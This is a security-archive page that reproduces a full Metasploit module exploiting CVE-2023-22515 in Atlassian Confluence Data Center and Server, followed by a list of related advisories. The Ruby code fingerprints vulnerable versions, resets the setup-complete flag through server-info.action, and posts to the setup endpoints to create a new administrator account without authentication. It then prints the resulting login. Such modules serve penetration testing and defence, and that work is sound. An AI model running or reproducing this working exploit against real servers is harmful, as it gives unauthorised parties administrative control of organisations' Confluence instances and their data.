Lucene search
Unknown, Emir Polat, metasploit.comPACKETSTORM:177302HistoryFeb 27, 2024 - 12:00 a.m.
Atlassian Confluence Data Center And Server Authentication Bypass
2024-02-2700:00:00
unknown, Emir Polat, metasploit.com
packetstormsecurity.com
121
atlassian
confluence
data center
server
authentication bypass
broken access control
cve-2023-22515
privilege escalation
vulnerability
remote
http
metasploit
exploit
rapid7
admin account
setup
complete
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',
'Description' => %q{
This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.
A specially crafted request can be create new admin account without authentication on the target Atlassian server.
},
'Author' => [
'Unknown', # exploited in the wild
'Emir Polat' # metasploit module
],
'References' => [
['CVE', '2023-22515'],
['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],
['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']
],
'DisclosureDate' => '2023-10-04',
'DefaultOptions' => {
'RPORT' => 8090
},
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/login.action')
)
return Exploit::CheckCode::Unknown unless res
return Exploit::CheckCode::Safe unless res.code == 200
poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/
confluence_version = Rex::Version.new(Regexp.last_match(1))
vprint_status("Detected Confluence version: #{confluence_version}")
if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||
confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||
confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))
return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
end
Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")
end
def run
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/server-info.action'),
'vars_get' => {
'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
}
)
return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200
print_good('Found server-info.action! Trying to ignore setup.')
created_user = create_admin_user
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),
'headers' => {
'X-Atlassian-Token' => 'no-check'
}
)
return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user
print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: datastore['NEW_USERNAME'],
private_type: :password,
private_data: datastore['NEW_PASSWORD'],
service_name: 'Atlassian Confluence',
address: datastore['RHOST'],
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")
print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")
end
def create_admin_user
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),
'headers' => {
'X-Atlassian-Token' => 'no-check'
},
'vars_post' => {
'username' => datastore['NEW_USERNAME'],
'fullName' => 'New Admin',
'email' => datastore['NEW_EMAIL'],
'password' => datastore['NEW_PASSWORD'],
'confirm' => datastore['NEW_PASSWORD'],
'setup-next-button' => 'Next'
}
)
res&.code == 302
end
end
`
Related
thn
thn
ics
ics
Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks
2023-10-16 12:00:00
#StopRansomware: RansomHub Ransomware
2024-08-29 12:00:00
packetstorm
packetstorm
Atlassian Confluence Unauthenticated Remote Code Execution
2023-10-19 00:00:00
metasploit
metasploit
Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control
2023-10-11 19:09:22
Atlassian Confluence Unauthenticated Remote Code Execution
2023-10-16 19:50:18
githubexploit
githubexploit
Exploit for Improper Input Validation in Atlassian Confluence Data Center
2023-10-21 13:59:16
Exploit for Improper Input Validation in Atlassian Confluence Data Center
2023-10-21 13:59:16
Exploit for Improper Input Validation in Atlassian Confluence Data Center
2023-10-11 08:42:17
nuclei
nuclei
Atlassian Confluence - Privilege Escalation
2023-10-10 13:20:42
vulnrichment
vulnrichment
CVE-2023-22515
2023-10-04 14:00:00
saint
saint
Atlassian Confluence Data Center and Server broken access control
2023-11-02 00:00:00
Atlassian Confluence Data Center and Server broken access control
2023-11-02 00:00:00
impervablog
impervablog
Atlassian CVE-2023-22515 Blocked by Imperva
2023-10-11 22:29:06
Imperva customers are protected against CVE-2023-22518 in Confluence Data Center and Server
2023-11-03 22:58:05
Recent Vulnerabilities in Popular Applications Blocked by Imperva
2023-10-11 22:46:45
zdt
zdt
Atlassian Confluence Unauthenticated Remote Code Execution Exploit
2023-10-19 00:00:00
Atlassian Confluence Data Center and Server - Authentication Bypass Exploit
2024-02-27 00:00:00
prion
prion
Design/Logic Flaw
2023-10-04 14:15:00
malwarebytes
malwarebytes
Ransomware review: November 2023
2023-11-15 22:18:06
Update now! Atlassian Confluence vulnerability is being actively exploited
2023-10-12 04:00:00
nvd
nvd
CVE-2023-22515
2023-10-04 14:15:10
cve
cve
CVE-2023-22515
2023-10-04 14:15:10
rapid7blog
rapid7blog
CVE-2023-22515: Zero-Day Privilege Escalation in Confluence Server and Data Center
2023-10-04 15:28:53
Rapid7-Observed Exploitation of Atlassian Confluence CVE-2023-22518
2023-11-06 15:31:47
Metasploit Weekly Wrap-Up
2023-10-19 20:15:08
hivepro
hivepro
Attacks, Vulnerabilities and Actors 2 October to 8 October 2023
2023-10-14 07:43:44
Atlassian Confluence Zero-Day Actively Exploited in the Wild
2023-10-06 07:01:32
exploitdb
exploitdb
cvelist
cvelist
CVE-2023-22515
2023-10-04 14:00:00
cisa_kev
cisa_kev
nessus
nessus
qualysblog
qualysblog
attackerkb
attackerkb
CVE-2023-22515
2023-10-04 00:00:00
wallarmlab
wallarmlab
atlassian
atlassian
DoS (Denial of Service) in Confluence Data Center and Server
2023-09-07 07:28:40
avleonov
avleonov